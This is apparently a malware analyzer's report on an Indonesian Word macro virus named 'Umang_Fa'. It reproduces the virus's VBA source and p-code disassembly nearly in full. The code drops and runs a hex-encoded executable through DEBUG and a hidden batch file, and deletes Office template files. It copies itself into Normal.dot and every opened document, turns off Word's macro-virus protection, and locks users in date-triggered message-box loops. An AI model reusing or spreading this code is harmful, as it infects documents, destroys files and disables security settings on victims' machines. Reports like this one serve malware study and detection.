Print #hFile, "E 0EA0 69 46 F6 30 75 99 F7 F9 03 F8 56 57 9A FA 06 BB"
Print #hFile, "E 0EB0 0A 8B C8 81 C1 E8 03 69 46 F8 30 75 99 F7 F9 03"
Print #hFile, "E 0EC0 46 FE 50 FF 76 FC FF 76 FA 6A 01 9A FF FF 00 00"
Print #hFile, "E 0ED0 B8 FF FF 5E 5F C9 CA 06 00 2E 00 03 01 F0 09 02"
Print #hFile, "E 0EE0 00 71 00 03 01 FA 09 02 00 72 00 02 00 7C 08 01"
Print #hFile, "E 0EF0 00 00 00 03 01 29 05 01 00 01 00 03 01 49 00 01"
Print #hFile, "E 0F00 00 03 00 03 01 62 04 01 00 83 00 03 01 16 08 01"
Print #hFile, "E 0F10 00 05 00 03 01 BB 08 01 00 06 00 03 01 5D 08 01"
Print #hFile, "E 0F20 00 07 00 03 01 0C 09 02 00 01 00 03 01 20 05 01"
Print #hFile, "E 0F30 00 89 00 05 01 B4 07 01 00 72 00 03 01 DF 08 01"
Print #hFile, "E 0F40 00 0A 00 03 01 89 00 02 00 05 00 03 01 EF 0A 02"
Print #hFile, "E 0F50 00 06 00 03 01 8F 06 01 00 10 00 03 01 81 0A 02"
Print #hFile, "E 0F60 00 0A 00 03 01 E8 0A 02 00 0C 00 03 01 9D 06 01"
Print #hFile, "E 0F70 00 14 00 03 01 0A 08 01 00 17 00 03 01 22 08 01"
Print #hFile, "E 0F80 00 18 00 03 01 80 00 01 00 1E 00 03 01 FC 08 02"
Print #hFile, "E 0F90 00 17 00 03 01 47 0B 02 00 1F 00 03 01 6D 0B 02"
Print #hFile, "E 0FA0 00 20 00 03 01 5B 0B 02 00 23 00 03 01 90 0A 02"
Print #hFile, "E 0FB0 00 A4 01 03 01 CA 09 02 00 29 00 03 01 F9 02 01"
Print #hFile, "E 0FC0 00 31 00 03 01 D9 09 02 00 2A 00 03 01 C5 0A 01"
Print #hFile, "E 0FD0 00 33 00 03 01 DD 0A 01 00 34 00 03 01 78 09 02"
Print #hFile, "E 0FE0 00 AE 00 03 01 75 0A 01 00 39 00 03 01 51 0B 02"
Print #hFile, "E 0FF0 00 31 00 03 01 A5 0A 01 00 3B 00 03 01 55 0A 02"
Print #hFile, "E 1000 00 B3 00 03 01 0A 0B 02 00 36 00 03 01 2C 0C 02"
Print #hFile, "E 1010 00 38 00 03 01 9F 09 02 00 39 00 03 01 2A 0B 02"
Print #hFile, "E 1020 00 3A 00 05 01 10 00 01 00 B2 00 03 01 1E 00 01"
Print #hFile, "E 1030 00 5B 00 03 01 8C 02 01 00 66 00 03 01 48 0A 02"
Print #hFile, "E 1040 00 6B 00 03 01 0A 0A 02 00 6C 00 00 00 00 00 00"
Print #hFile, "E 1050 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #hFile, "E 1060 00 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00"
Print #hFile, "E 1070 00 00 00 00 00 00 00 00 00 00 00 00 01 00 FF FF"
Print #hFile, "E 1080 00 00 00 00 5F 43 5F 46 49 4C 45 5F 49 4E 46 4F"
Print #hFile, "E 1090 3D 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #hFile, "E 10A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 01"
Print #hFile, "E 10B0 00 00 14 00 14 00 28 00 00 00 00 00 00 00 00 00"
Print #hFile, "E 10C0 00 00 00 00 00 00 00 00 00 00 00 00 C1 00 00 00"
Print #hFile, "E 10D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #hFile, "E 10E0 00 00 00 00 00 00 8A 00 00 00 00 00 00 00 00 00"
Print #hFile, "E 10F0 00 00 00 00 00 00 00 10 01 00 00 00 00 00 00 00"
Print #hFile, "E 1100 00 00 41 6C 6F 61 70 00 41 6C 6F 61 70 20 41 70"
Print #hFile, "E 1110 70 20 41 6C 72 65 61 64 79 20 52 75 6E 6E 69 6E"
Print #hFile, "E 1120 67 00 61 6C 6F 61 70 69 63 6F 00 00 41 4C 4F 41"
Print #hFile, "E 1130 50 57 6E 64 43 6C 61 73 73 00 41 6C 6F 61 70 20"
Print #hFile, "E 1140 57 69 6E 64 6F 77 00 00 54 69 6D 65 72 00 25 64"
Print #hFile, "E 1150 00 00 20 53 74 65 66 61 6E 6F 20 50 65 72 6F 74"
Print #hFile, "E 1160 74 6F 20 2D 20 31 39 39 34 00 50 72 6F 6A 65 63"
Print #hFile, "E 1170 74 00 23 33 32 37 37 32 00 00 00 00 00 00 00 00"
Print #hFile, "E 1180 00 00 00 00 00 00 00 00 3C 3C 4E 4D 53 47 3E 3E"
Print #hFile, "E 1190 00 00 52 36 30 30 30 0D 0A 2D 20 73 74 61 63 6B"
Print #hFile, "E 11A0 20 6F 76 65 72 66 6C 6F 77 0D 0A 00 03 00 52 36"
Print #hFile, "E 11B0 30 30 33 0D 0A 2D 20 69 6E 74 65 67 65 72 20 64"
Print #hFile, "E 11C0 69 76 69 64 65 20 62 79 20 30 0D 0A 00 09 00 52"
Print #hFile, "E 11D0 36 30 30 39 0D 0A 2D 20 6E 6F 74 20 65 6E 6F 75"
Print #hFile, "E 11E0 67 68 20 73 70 61 63 65 20 66 6F 72 20 65 6E 76"
Print #hFile, "E 11F0 69 72 6F 6E 6D 65 6E 74 0D 0A 00 12 00 52 36 30"
Print #hFile, "E 1200 31 38 0D 0A 2D 20 75 6E 65 78 70 65 63 74 65 64"
Print #hFile, "E 1210 20 68 65 61 70 20 65 72 72 6F 72 0D 0A 00 14 00"
Print #hFile, "E 1220 52 36 30 32 30 0D 0A 2D 20 75 6E 65 78 70 65 63"
Print #hFile, "E 1230 74 65 64 20 51 75 69 63 6B 57 69 6E 20 65 72 72"
Print #hFile, "E 1240 6F 72 0D 0A 00 08 00 52 36 30 30 38 0D 0A 2D 20"
Print #hFile, "E 1250 6E 6F 74 20 65 6E 6F 75 67 68 20 73 70 61 63 65"
Print #hFile, "E 1260 20 66 6F 72 20 61 72 67 75 6D 65 6E 74 73 0D 0A"
Print #hFile, "E 1270 00 15 00 52 36 30 32 31 0D 0A 2D 20 6E 6F 20 6D"
Print #hFile, "E 1280 61 69 6E 20 70 72 6F 63 65 64 75 72 65 0D 0A 00"
Print #hFile, "E 1290 FC 00 0D 0A 00 FF 00 72 75 6E 2D 74 69 6D 65 20"
Print #hFile, "E 12A0 65 72 72 6F 72 20 00 02 00 52 36 30 30 32 0D 0A"
Print #hFile, "E 12B0 2D 20 66 6C 6F 61 74 69 6E 67 2D 70 6F 69 6E 74"
Print #hFile, "E 12C0 20 73 75 70 70 6F 72 74 20 6E 6F 74 20 6C 6F 61"
Print #hFile, "E 12D0 64 65 64 0D 0A 00 FF FF FF 00 00 00 00 00 00 00"
Print #hFile, "E 12E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #hFile, "E 12F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #hFile, "E 1300 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #hFile, "E 1310 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #hFile, "E 1320 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #hFile, "E 1330 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #hFile, "E 1340 00 00 01 00 01 00 20 20 10 00 01 00 04 00 E8 02"
Print #hFile, "E 1350 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #hFile, "E 1360 28 00 00 00 20 00 00 00 40 00 00 00 01 00 04 00"
Print #hFile, "E 1370 00 00 00 00 80 02 00 00 00 00 00 00 00 00 00 00"
Print #hFile, "E 1380 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00"
Print #hFile, "E 1390 00 80 00 00 00 80 80 00 80 00 00 00 80 00 80 00"
Print #hFile, "E 13A0 80 80 00 00 80 80 80 00 C0 C0 C0 00 00 00 FF 00"
Print #hFile, "E 13B0 00 FF 00 00 00 FF FF 00 FF 00 00 00 FF 00 FF 00"
Print #hFile, "E 13C0 FF FF 00 00 FF FF FF 00 00 00 00 00 00 00 00 00"
Print #hFile, "E 13D0 00 00 00 00 00 00 00 00 FF FF FF FF FF FF FF FF"
Print #hFile, "E 13E0 FF FF FF FF FF FF FF 00 FF FF FF FF FF FF FF FF"
Print #hFile, "E 13F0 FF FF FF FF FF FF FF 00 FF 9F FF FF FF FF FF FF"
Print #hFile, "E 1400 FF FF FF FF FF FF FF 00 FF 9F FF FF FF FF FF FF"
Print #hFile, "E 1410 FF FF FF FF FF FF FF 00 FF 9F FF FF FF FF FF FF"
Print #hFile, "E 1420 FF FF FF FF F9 FF FF 00 FF F9 99 9F FF FF FF FF"
Print #hFile, "E 1430 FF FF FF FF 9F 9F FF 00 FF FF FF F9 99 9F FF FF"
Print #hFile, "E 1440 FF FF FF F9 FF F9 FF 00 FF FF FF FF FF 9F FF FF"
Print #hFile, "E 1450 FF FF FF 9F FF FF FF 00 FF FF FF FF FF F9 FF FF"
Print #hFile, "E 1460 FF FF F9 FF FF FF FF 00 FF FF FF FF FF F9 9F FF"
Print #hFile, "E 1470 FF FF F9 FF FF FF FF 00 FF FF FF FF FF FF 9F FF"
Print #hFile, "E 1480 FF FF 99 FF FF FF FF 00 FF FF FF FF FF FF 99 99"
Print #hFile, "E 1490 99 99 9F FF FF FF FF 00 FF FF FF FF FF FF F9 99"
Print #hFile, "E 14A0 FF FF FF FF FF FF FF 00 FF FF FF FF FF FF F9 99"
Print #hFile, "E 14B0 FF FF FF FF FF FF FF 00 FF FF FF 9F FF FF FF 99"
Print #hFile, "E 14C0 9F FF FF F9 FF FF FF 00 FF FF FF F9 FF FF FF F9"
Print #hFile, "E 14D0 9F FF FF 9F 9F FF FF 00 FF FF FF FF 9F FF FF FF"
Print #hFile, "E 14E0 99 FF 99 FF F9 FF FF 00 FF FF FF FF F9 FF FF FF"
Print #hFile, "E 14F0 99 F9 FF FF FF 9F FF 00 FF FF FF FF FF 9F FF FF"
Print #hFile, "E 1500 99 9F FF FF FF FF FF 00 FF FF FF FF FF F9 99 99"
Print #hFile, "E 1510 99 9F FF FF FF FF FF 00 FF FF FF FF FF FF FF FF"
Print #hFile, "E 1520 FF 9F FF FF FF FF FF 00 FF FF FF FF FF FF FF FF"
Print #hFile, "E 1530 FF 99 99 FF FF FF FF 00 FF FF FF FF FF FF FF FF"
Print #hFile, "E 1540 FF F9 99 9F FF FF FF 00 FF FF FF FF FF FF FF FF"
Print #hFile, "E 1550 FF F9 99 99 FF FF FF 00 FF FF FF FF FF FF FF FF"
Print #hFile, "E 1560 FF FF 99 99 FF FF FF 00 FF FF FF FF FF FF FF FF"
Print #hFile, "E 1570 FF FF F9 9F FF FF FF 00 FF FF FF FF FF FF FF FF"
Print #hFile, "E 1580 FF FF FF FF FF FF FF 00 FF FF FF FF FF FF FF FF"
Print #hFile, "E 1590 FF FF FF FF FF FF FF 00 FF FF FF FF FF FF FF FF"
Print #hFile, "E 15A0 FF FF FF FF FF FF FF 00 00 00 00 00 00 00 00 00"
Print #hFile, "E 15B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #hFile, "E 15C0 00 00 00 00 00 00 00 00 FF FF FF FF 00 00 00 03"
Print #hFile, "E 15D0 00 00 00 03 00 00 00 03 00 00 00 03 00 00 00 03"
Print #hFile, "E 15E0 00 00 00 03 00 00 00 03 00 00 00 03 00 00 00 03"
Print #hFile, "E 15F0 00 00 00 03 00 00 00 03 00 00 00 03 00 00 00 03"
Print #hFile, "E 1600 00 00 00 03 00 00 00 03 00 00 00 03 00 00 00 03"
Print #hFile, "E 1610 00 00 00 03 00 00 00 03 00 00 00 03 00 00 00 03"
Print #hFile, "E 1620 00 00 00 03 00 00 00 03 00 00 00 03 00 00 00 03"
Print #hFile, "E 1630 00 00 00 03 00 00 00 03 00 00 00 03 00 00 00 03"
Print #hFile, "E 1640 FF FF FF FF FF FF FF FF 00 00 00 00 00 00 00 00"
Print #hFile, "RCX"
Print #hFile, "1550"
Print #hFile, "W"
Print #hFile, "Q"
Close hFile
End Sub
Sub startv(strFile As String)
Dim hFile As Long
Close hFile
On Error Resume Next
hFile = FreeFile
Open strFile For Output Access Write As hFile
Print #hFile, "@echo off"
Print #hFile, "cd\"
Print #hFile, "debug < start.scr > nul"
Print #hFile, "copy start.com start.exe"
Print #hFile, "del start.com"
Print #hFile, "del start.scr"
Print #hFile, "start"
Print #hFile, "del start.com"
Print #hFile, "del startv.bat"
Close hFile
Shell ("c:\startv.bat"), vbHide
End Sub
Sub zap(strFile As String)
Dim hFile As Long
Close hFile
On Error Resume Next
hFile = FreeFile
Open strFile For Output Access Write As hFile
Print #hFile, "@echo off"
Print #hFile, "del c:\progra~1\micros~1\office\startup\*.dot"
Print #hFile, "del c:\progra~1\micros~1\templa~1\*.dot"
Print #hFile, "del zap.bat"
Close hFile
Shell ("c:\windows\zap.bat"), vbHide
End Sub
Sub FileOpen()
On Error Resume Next
WBT
If Dialogs(80).Show <> 0 Then
'Call AutoOpen
Dockenor
Norkedoc
Call Umang_Fa
WBF
Else
WBF
End If
End Sub
Sub pesen()
msg1 = "Eh....kamu Kurang Ajar dibilangin"
msg2 = "Nah..... Gue Murka... Gue sumpahin"
msg3 = "..........GEMPA BUMI .............."
MsgBox (msg1 + Chr(10) + msg2 + Chr(10) + msg3)
End Sub
Sub ultah()
Do
nama1 = "Unang Triwidhiyanti"
Nama2 = "Nur firmanullah"
msg1 = "Hari ini hari yang berbahagia buat temanku "
msg2 = "Jadi Elo-elo pade Nggak usah ngetik yang buat elo pusing deh...."
msg3 = "Mendingan Elo sekarang matiin komputer terus tidur dan istirahat "
msg4 = "Tapi Jangan Lupa Loh... Ucapin selamat Ulang tahun Buat "
If Month(Now()) = 1 And Day(Now()) = 9 Then MsgBox msg1 + nama1 + Chr(10) + msg2 + Chr(10) + msg3 + nama1, vbInformation, "Pesen Mimang"
If Month(Now()) = 11 And Day(Now()) = 16 Then MsgBox msg1 + Nama2 + Chr(10) + msg2 + Chr(10) + msg3 + Nama2, vbInformation, "Pesen Mimang"
Loop
End Sub
Function Dockenor()
On Error GoTo Erw1
Norok = False
WBT
Set AD = ActiveDocument
Set NT = NormalTemplate
On Error GoTo Erh1a
For i = 1 To NormalTemplate.VBProject.VBComponents.Count
NMacr = NormalTemplate.VBProject.VBComponents(i).Name
If NMacr = "Umang_Fa" Then Norok = True
If (NMacr <> "Umang_Fa") And (NMacr <> "ThisDocument") Then
MsgBox ("Normal Template Anda Terkena Virus Macro = " + NMacr + Chr(13) + "Virus Makro akan dihapus dan tunggu Sejenak"), vbInformation, "Pesen Mimang"
Application.OrganizerDelete Source:=NormalTemplate.FullName, _
Name:=NMacr, Object:=wdOrganizerObjectProjectItems
End If
Next i
Erh1a:
If Norok = False Then
On Error GoTo Erh1
Application.OrganizerCopy Source:=ActiveDocument.FullName, _
Destination:=NormalTemplate.FullName, Name:= _
"Umang_Fa", Object:=wdOrganizerObjectProjectItems
Templates(NormalTemplate.FullName).Save
NormalTemplate.Application.Visible = False
Erh1:
End If
Erw1:
End Function
Function Norkedoc()
On Error GoTo Erw2
DokSave = 0
Dokok = False
Set AD = ActiveDocument
Set NT = NormalTemplate
On Error GoTo Erh2a
For i = 1 To AD.VBProject.VBComponents.Count
NMacr = AD.VBProject.VBComponents(i).Name
If NMacr = "Umang_Fa" Then Dokok = True
'NMacr = NT.VBProject.VBComponents(i).Name
'If NMacr = "Umang_Fa" Then Dokok = True
If (NMacr <> "Umang_Fa") And _
(NMacr <> "ThisDocument") And (NMacr <> "Reference to Normal") Then
MsgBox ("Documen Anda Terkena Virus Macro = " + NMacr + Chr(13) + "Virus Makro akan dihapus dan tunggu Sejenak"), vbInformation, "Pesen Mimang"
Application.OrganizerDelete Source:=AD.FullName, _
Name:=NMacr, Object:=wdOrganizerObjectProjectItems
End If
Next i
Erh2a:
If Dokok = False Then
On Error GoTo Erh2
Application.OrganizerCopy Source:=NT.FullName, _
Destination:=AD.FullName, Name:= _
"Umang_Fa", Object:=wdOrganizerObjectProjectItems
ActiveDocument.ReadOnlyRecommended = False
ActiveDocument.Save
Erh2:
End If
Erw2:
End Function
Function WBT()
WordBasic.DisableAutoMacros True
End Function
Function WBF()
WordBasic.DisableAutoMacros False
End Function
Function sim()
f56879025 = GetAttr(NormalTemplate.FullName)
Application.VBE.ActiveVBProject.VBComponents("Umang_Fa").Export "c:\windows\system\vxd.sys"
If f56879025 = vbReadOnly Then GoTo bodo
If f56879025 = vbReadOnly + vbArchive Then GoTo bodo
For i = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(i).Name = "Umang_Fa" Then xxx902578112 = True
Next i
For i = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(i).Name = "Umang_Fa" Then mmf78116 = True
Next i
If xxx902578112 = True And mmf78116 = False Then Set o7811902511 = NormalTemplate.VBProject.VBComponents
If xxx902578112 = False And mmf78116 = True Then Set o7811902511 = ActiveDocument.VBProject.VBComponents
o7811902511.Import "c:\windows\system\vxd.sys"
If activeinst = False Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
If mmf78116 = False Then If NormalTemplate.Saved = False Then NormalTemplate.Save
bodo:
End Function
' Processing file: /tmp/qstore_wal_x7fw
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 1120 bytes
' Macros/VBA/Umang_Fa - 55255 bytes
' Line #0:
' Dim (Public)
' VarDefn AD (As Object)
' VarDefn NT (As Object)
' Line #1:
' FuncDefn (Sub AutoOpen())
' Line #2:
' OnError hapus
' Line #3:
' Dim
' VarDefn NT (As Object)
' Line #4:
' ArgsCall Dockenor 0x0000
' Line #5:
' ArgsCall Create_Loader 0x0000
' Line #6:
' ArgsCall Norkedoc 0x0000
' Line #7:
' Ld wdCancelDisabled
' Ld Application
' MemSt EnableCancelKey
' Line #8:
' LitVarSpecial (False)
' Ld Options
' MemSt VirusProtection
' Line #9:
' LitVarSpecial (False)
' Ld Options
' MemSt SaveNormalPrompt
' Line #10:
' LitVarSpecial (False)
' Ld Options
' MemSt ConfirmConversions
' Line #11:
' StartForVariable
' Ld i
' EndForVariable
' LitDI2 0x0001
' Ld NormalTemplate
' MemLd VBProject
' MemLd VBComponents
' MemLd Count
' For
' Line #12:
' Ld i
' Ld NormalTemplate
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd New
' LitStr 0x0008 "Umang_Fa"
' Eq
' If
' BoSImplicit
' LitVarSpecial (True)
' St NormInstall
' EndIf
' Line #13:
' StartForVariable
' Ld i
' EndForVariable
' NextVar
' Line #14:
' StartForVariable
' Ld i
' EndForVariable
' LitDI2 0x0001
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' MemLd Count
' For
' Line #15:
' Ld i
' Ld ActiveDocument
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd New
' LitStr 0x0008 "Umang_Fa"
' Eq
' If
' BoSImplicit
' LitVarSpecial (True)
' St ActivInstall
' EndIf
' Line #16:
' StartForVariable
' Ld i
' EndForVariable
' NextVar
' Line #17:
' Ld ActivInstall
' LitVarSpecial (True)
' Eq
' Ld NormInstall
' LitVarSpecial (True)
' Eq
' And
' If
' BoSImplicit
' GoTo Label_Exit
' EndIf
' Line #18:
' Ld ActivInstall
' LitVarSpecial (True)
' Eq
' Ld NormInstall
' LitVarSpecial (False)
' Eq
' And
' If
' BoSImplicit
' SetStmt
' Ld ActiveDocument
' Set Doc
' EndIf
' Line #19:
' Ld ActivInstall
' LitVarSpecial (False)
' Eq
' Ld NormInstall
' LitVarSpecial (True)
' Eq
' And
' If
' BoSImplicit
' SetStmt
' Ld NormalTemplate
' Set Doc
' EndIf
' Line #20:
' Ld wdDocumentsPath
' Ld Options
' ArgsMemLd DefaultFilePath 0x0001
' St Pad
' Line #21:
' LitStr 0x0008 "Umang_Fa"
' Ld Doc
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' MemLd CountOfLines
' St ModuleLength
' Line #22:
' Ld NT
' ArgsMemCall Save 0x0000
' Line #23:
' Ld Pad
' LitStr 0x0008 "\Fax.txt"
' Paren
' Add
' LitStr 0x0008 "Umang_Fa"
' Ld Doc
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' ArgsMemCall Export 0x0001
' Line #24:
' Ld ActiveDocument
' MemLd FullName
' ParamNamed FileName
' Ld wdFormatDocument
' ParamNamed FileFormat
' Ld ActiveDocument
' ArgsMemCall SaveAs 0x0002
' Line #25:
' ArgsCall Umang_Fa 0x0000
' Line #26:
' Label Label_Exit
' Line #27:
' LitStr 0x0018 "Templates and Add-Ins..."
' LitStr 0x0005 "Tools"
' ArgsLd CommandBars 0x0001
' ArgsMemLd Controls 0x0001
' ArgsMemCall Delete 0x0000
' Line #28:
' QuoteRem 0x0000 0x0031 "CommandBars("Format").Controls("Style...").Delete"
' Line #29:
' Ld NormInstall
' LitVarSpecial (True)
' Eq
' If
' BoSImplicit
' ArgsCall (Call) Create_Loader 0x0000
' EndIf
' Line #30:
' LitVarSpecial (True)
' Ld Application
' MemSt ScreenUpdating
' Line #31:
' Ld wdAlertsAll
' Ld Application
' MemSt DisplayAlerts
' Line #32:
' Ld wdCancelInterrupt
' Ld Application
' MemSt EnableCancelKey
' Line #33:
' Label hapus
' Line #34:
' ArgsCall Dockenor 0x0000
' Line #35:
' EndSub
' Line #36:
' FuncDefn (Sub Create_Loader())
' Line #37:
' OnError (Resume Next)
' Line #38:
' LitStr 0x000A "C:\Windows"
' Ld wdStartupPath
' Ld Options
' ArgsMemSt DefaultFilePath 0x0001
' Line #39:
' LitStr 0x000E "C:\Windows\inf"
' Ld wdTempFilePath
' Ld Options
' ArgsMemSt DefaultFilePath 0x0001
' Line #40:
' Ld wdStartupPath
' Ld Options
' ArgsMemLd DefaultFilePath 0x0001
' St Pad1
' Line #41:
' Ld Pad1
' LitStr 0x0008 "\Fax.dot"
' Add
' ArgsLd Dir 0x0001
' St MyFile
' Line #42:
' Ld MyFile
' LitStr 0x0000 ""
' Eq
' IfBlock
' Line #43:
' SetStmt
' Ld NormalTemplate
' MemLd OpenAsDocument
' Set aDoc
' Line #44:
' StartWithExpr
' Ld aDoc
' With
' Line #45:
' Ld Pad1
' LitStr 0x0008 "\Fax.dot"
' Add
' ParamNamed FileName
' ArgsMemCallWith SaveAs 0x0001
' Line #46:
' Ld wdDoNotSaveChanges
' ParamNamed SaveChanges
' ArgsMemCallWith Close 0x0001
' Line #47:
' EndWith
' Line #48:
' EndIfBlock
' Line #49:
' EndSub
' Line #50:
' FuncDefn (Sub Umang_Fa())
' Line #51:
' OnError (Resume Next)
' Line #52:
' QuoteRem 0x0000 0x0008 "Dockenor"
' Line #53:
' ArgsCall Norkedoc 0x0000
' Line #54:
' QuoteRem 0x0000 0x0008 "Call sim"
' Line #55:
' ArgsCall (Call) Create_Loader 0x0000
' Line #56:
' LitVarSpecial (False)
' Ld Options
' MemSt ConfirmConversions
' Line #57:
' LitVarSpecial (False)
' Ld Options
' MemSt VirusProtection
' Line #58:
' LitVarSpecial (False)
' Ld Options
' MemSt SaveNormalPrompt
' Line #59:
' LitVarSpecial (False)
' Ld ActiveDocument
' MemSt ReadOnlyRecommended
' Line #60:
' ArgsLd Now 0x0000
' ArgsLd Month 0x0001
' LitDI2 0x0001
' Eq
' ArgsLd Now 0x0000
' ArgsLd Day 0x0001
' LitDI2 0x0009
' Eq
' And
' If
' BoSImplicit
' ArgsCall (Call) ultah 0x0000
' EndIf
' Line #61:
' ArgsLd Now 0x0000
' ArgsLd Month 0x0001
' LitDI2 0x000B
' Eq
' ArgsLd Now 0x0000
' ArgsLd Day 0x0001
' LitDI2 0x0010
' Eq
' And
' If
' BoSImplicit
' ArgsCall (Call) ultah 0x0000
' EndIf
' Line #62:
' StartWithExpr
' Ld wdDialogFileSummaryInfo
' ArgsLd Dialogs 0x0001
' With
' Line #63:
' LitStr 0x0021 "Phurbaranji ....... Bandarlampung"
' MemStWith Author
' Line #64:
' LitStr 0x0020 "Word Macro Virus.... it just fun"
' MemStWith Title
' Line #65:
' LitStr 0x0029 "Dedicate for My Lv Umang_Fa Triwidhiyanti"
' MemStWith Subject
' Line #66:
' LitStr 0x0067 "Virus ini tidak berbahaya anda jangan coba-coba merubah atau menggunakan Tools|Macro Ntar tau akibatnya"
' MemStWith Comments
' Line #67:
' ArgsMemCallWith Execute 0x0000
' Line #68:
' EndWith
' Line #69:
' Label bodo
' Line #70:
' EndSub
…
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.